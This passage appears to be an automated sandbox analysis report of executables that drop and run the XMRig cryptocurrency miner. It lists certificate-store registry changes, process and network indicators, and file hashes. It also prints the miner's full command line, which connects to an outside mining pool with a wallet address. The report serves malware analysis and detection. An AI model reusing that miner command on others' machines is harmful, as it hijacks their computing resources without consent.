f46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3712 wrote to memory of 1884 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3712 wrote to memory of 1884 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (3) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1884-16-0x0000018721390000-0x00000187213B0000-memory.dmp
memory/1884-17-0x0000018722C90000-0x0000018722CB0000-memory.dmp
memory/1884-18-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-19-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-20-0x0000018722CB0000-0x0000018722CD0000-memory.dmp
memory/1884-21-0x0000018722CD0000-0x0000018722CF0000-memory.dmp
memory/1884-22-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-23-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-24-0x0000018722CB0000-0x0000018722CD0000-memory.dmp
memory/1884-25-0x0000018722CD0000-0x0000018722CF0000-memory.dmp
memory/1884-26-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-27-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-28-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-29-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-30-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-31-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-32-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-33-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-34-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-35-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-36-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-37-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-38-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-39-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-40-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-41-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-42-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-43-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-44-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-45-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-46-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-47-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-48-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-49-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-50-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-51-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-52-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-53-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-54-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-55-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-56-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-57-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-58-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-59-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-60-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-61-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-62-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-63-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-64-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-65-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-66-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-67-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-68-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-69-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-70-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-71-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-72-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-73-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-74-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-75-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-76-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-77-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-78-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-79-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-80-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-81-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-82-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-83-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
memory/1884-84-0x00007FF616FB0000-0x00007FF617AB3000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-05-27 17:06
Reported
2024-05-27 17:54
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 220 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 220 wrote to memory of 2280 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp | |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.24.18.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2280-16-0x00000163AD3F0000-0x00000163AD410000-memory.dmp
memory/2280-17-0x00000163AD640000-0x00000163AD660000-memory.dmp
memory/2280-18-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-20-0x00000163AEE10000-0x00000163AEE30000-memory.dmp
memory/2280-19-0x00000163AEE30000-0x00000163AEE50000-memory.dmp
memory/2280-21-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-22-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-25-0x00000163AEE10000-0x00000163AEE30000-memory.dmp
memory/2280-24-0x00000163AEE30000-0x00000163AEE50000-memory.dmp
memory/2280-23-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-26-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-27-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-28-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-29-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-30-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-31-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-32-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-33-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-34-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-35-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-36-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-37-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-38-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-39-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-40-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-41-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-42-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-43-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-44-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-45-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-46-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-47-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-48-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-49-0x00007FF752200000-0x00007FF752D03000-memory.dmp
memory/2280-50-0x00007FF752200000-0x00007FF752D03000-memory.dmp
